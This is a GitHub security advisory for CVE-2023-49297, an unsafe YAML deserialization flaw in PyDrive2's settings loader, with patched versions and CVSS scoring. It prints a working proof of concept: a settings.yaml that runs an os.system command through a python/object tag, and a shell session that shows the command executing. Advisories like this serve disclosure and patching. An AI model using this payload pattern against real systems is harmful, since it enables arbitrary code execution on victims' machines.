Skip to content

PyDrive2's unsafe YAML deserialization in LoadSettingsFile allows arbitrary code execution

Low severity GitHub Reviewed Published Dec 5, 2023 in iterative/PyDrive2 • Updated Dec 16, 2023

Package

pip PyDrive2 (pip)

Affected versions

= 1.17.0
< 1.16.2

Patched versions

1.16.2

Description

Summary

Unsafe YAML deserilization will result in arbitrary code execution. A maliciously crafted YAML file can cause arbitrary code execution if PyDrive2 is run in the same directory as it, or if it is loaded in via LoadSettingsFile.

Details

The loader being imported from the yaml library is CLoader: https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L5

This loader is then used to load a user supplied file: https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L108-L121

CLoader is considered unsafe. It will allow any Python code inside of it to be executed. This loading behaviour also happens automatically, the file only needs to be present for this vulnerability to occur.

https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L9

Reference: https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf

PoC

  1. Create a malicious settings.yaml file:
!!python/object/new:os.system [echo poc]
  1. Initialize a GoogleAuth object .
from pydrive2.auth import GoogleAuth

gauth = GoogleAuth()
  1. Execute the code with the settings file present in your directory. The code inside the file will be executed:
[evan@ejedev PyDrive2]$ ls
CHANGES  client_secrets.json  CONTRIBUTING.rst  docs  examples  LICENSE  main.py  MANIFEST.in  pydrive2  pyproject.toml  pytest.ini  README.rst  settings.yaml  setup.py  tox.ini
[evan@ejedev PyDrive2]$ cat settings.yaml
!!python/object/new:os.system [echo poc]
[evan@ejedev PyDrive2]$ cat main.py 
from pydrive2.auth import GoogleAuth


gauth = GoogleAuth()
[evan@ejedev PyDrive2]$ python3 main.py 
poc

Alternatively, the file can be loaded in directly via pydrive2.settings.LoadSettingsFile

Impact

This is a deserilization attack that will affect any user who initializes GoogleAuth from this package while a malicious yaml file is present in the same directory. As it does not require it to be directly loaded through the code, only present, I believe this produces an extra element of risk.

References

@jesper7 jesper7 published to iterative/PyDrive2 Dec 5, 2023
Published by the National Vulnerability Database Dec 5, 2023
Published to the GitHub Advisory Database Dec 5, 2023
Reviewed Dec 5, 2023
Last updated Dec 16, 2023

Severity

Low
3.3
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Weaknesses

CVE ID

CVE-2023-49297

GHSA ID

GHSA-v5f6-hjmf-9mc5

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.